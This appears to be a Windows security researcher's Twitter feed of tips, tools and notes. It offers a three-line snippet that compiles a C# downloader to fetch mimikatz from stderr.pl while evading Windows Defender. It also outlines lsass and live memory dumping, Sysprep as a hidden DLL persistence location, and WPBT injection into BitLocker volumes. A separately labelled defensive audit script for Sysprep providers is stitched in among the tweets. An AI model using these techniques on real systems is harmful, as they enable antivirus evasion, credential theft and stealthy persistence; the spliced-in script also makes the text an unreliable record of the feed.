My own research, unless stated otherwise. Not necessarily "safe when taken as directed". GIT d- s+: a+ C++++ !U !L !M w++++$ b++++ G-

Joined April 2012
Live kernel dump with PowerShell one-liner 😎💪
$ss = Get-CimInstance -ClassName MSFT_StorageSubSystem -Namespace Root\Microsoft\Windows\Storage
Invoke-CimMethod -InputObject $ss -MethodName "GetDiagnosticInfo" -Arguments @{DestinationPath="C:\dmp"; IncludeLiveDump=$true}
Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus? Paste these 3 lines into the command line 👇👇👇 1/2
Echo class Program {static void Main() {System.IO.File.WriteAllBytes("mimi.exe", new System.Net.WebClient().DownloadData("stderr.pl/mimi/mimikatz.exe"));}}>setupcl.cs
%windir%\Microsoft.NET\Framework64\v4.0.30319\csc setupcl.cs
setupcl.exe
OK. Found another one in the sacsvr.dll. And the flow is:
1. dism /online /add-capability /capabilityName:Windows.Desktop.EMS-SAC.Tool…~~~~0.0.1.0
2. bcdedit /ems {current} on
3. connect COM1 to COM2
4. launch putty
5. use 'procdump' command after you identify the PID with 't'
Thought experiment: Find signed .exe that uses MiniDumpWriteDump to dump its procdump during its own crash. Instrument/NTFS transaction/patch it to swap PID in OpenProcess to lsass', and trigger exception. lsass dump? Caveat: it may use 'current process handle' w/o OpenProcess?
Not practical at all, but... Sysprep.exe loads custom DLLs from Windows\CurrentVersion\Setup\SysPrepExternal\<phasename> and calls the exported function specified after the comma. Arbitrary paths accepted.
You do not need to be an admin to run Sysprep. It's enough if you have SeShutdownPrivilege & SeBackupPrivilege & SeRestorePrivilege & SeSystemEnvironmentPrivilege in your token. 🙃
The flow of signature checking "asks" for the DLL willing to do the actual job for a file. Just out of curiosity I have created a simple DLL reporting who is asking and about which file. The source file and the compiled DLL if you want to play as well: github.com/gtworek/PSBits/tr…
BTW it is not such a bad idea, if you are looking for less known persistence locations. Highly privileged, automatic executions FTW.
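A defender-side audit of the Sysprep provider location described in the two Sysprep tweets above, as an added example that is not from this thread or from the author's PSBits repository. It assumes the entries live under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SysPrepExternal\<phase> as "<dll path>,<exported function>" strings, and the function name Get-SysprepExternalProvider is hypothetical.

```powershell
# Added audit helper (not from the original thread). Assumption: provider
# entries are REG_SZ values of the form "<dll path>,<export>" under the
# per-phase subkeys of SysPrepExternal. Reading HKLM needs no admin rights.
function Get-SysprepExternalProvider {
    [CmdletBinding()]
    param(
        [string]$BaseKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SysPrepExternal'
    )
    if (-not (Test-Path -LiteralPath $BaseKey)) { return }

    foreach ($phase in Get-ChildItem -LiteralPath $BaseKey) {
        $props = Get-ItemProperty -LiteralPath $phase.PSPath
        foreach ($p in $props.PSObject.Properties) {
            # Get-ItemProperty adds PSPath, PSParentPath, ... ; skip those
            if ($p.Name -like 'PS*') { continue }

            $entry = [string]$p.Value
            # Split only on the first comma: "path,export"; $func is $null if absent
            $dll, $func = $entry -split ',', 2
            $dll = [Environment]::ExpandEnvironmentVariables($dll.Trim())

            $exists = Test-Path -LiteralPath $dll
            $sig = if ($exists) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'Missing' }
            $inSystem32 = $dll -like "$env:windir\System32\*"

            [pscustomobject]@{
                Phase      = $phase.PSChildName
                ValueName  = $p.Name
                Dll        = $dll
                Function   = $func
                Signature  = $sig
                InSystem32 = $inSystem32
                # Anything outside System32 or without a valid signature deserves a look
                Suspicious = (-not $inSystem32) -or ($sig -ne 'Valid')
            }
        }
    }
}

# Report only the entries worth investigating
Get-SysprepExternalProvider | Where-Object Suspicious | Format-Table -AutoSize
```

Drop the `Where-Object Suspicious` filter to see the full baseline of providers on a clean image before comparing hosts.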
The second day of the #EuropeanCyberSecurityChallenge 2021 competition in Prague has started. Currently 🇵🇱 🇩🇪 and 🇩🇰 lead with a small difference in points. The competition runs until 18:00, keep your fingers crossed for our team🤞! 🇵🇱
If you are afraid of a WPBT-based attack, just create a zero-length wpbt.bin with the readonly attribute, and smss.exe will not overwrite it, and will never try to launch it.
You can use WPBT feature to inject a file into #BitLocker protected volume and make it execute within smss.exe context 😳 - link.medium.com/tSZNMciUQZ
And of course the filename is wpbbin.exe, and not wpbt.bin
Did you spot the "-IncludeLiveDump" parameter of the "Get-StorageDiagnosticInfo" #PowerShell cmdlet? It does exactly what the name suggests: live dump of the entire OS memory 😎 Yet another way, built-in tools only, again 🤷🏻‍♂️
Give me any reason to use SFTP when I have BITS.
- Built-in,
- Uses https,
- Works when device sleeps,
- Failsafe (reconnects automatically),
- Asynchronous (if you wish),
- Easy to manage via cmdline/PowerShell/API,
- Offers priorities and scheduling,
- Supports peer caching.
When attackers use BitLocker to encrypt your drives (sic!), digging through the ntds.dit file and looking for recovery keys may be the best option. And it's exactly why I created such a script. ExtractFVEPasswordsFromNTDS.ps1 Enjoy :) github.com/gtworek/PSBits/bl…
It all started with the STARTF_UNTRUSTEDSOURCE process flag. And then I asked myself: how can I check such flags in existing processes? As I could not find such a tool, I wrote one. Enjoy! :) C source code, and the compiled exe, as usual: github.com/gtworek/PSBits/tr…
LocalAlloc() takes Flags, and then Size as parameters. LocalReAlloc() takes Size, and then Flags. What Could Possibly Go Wrong?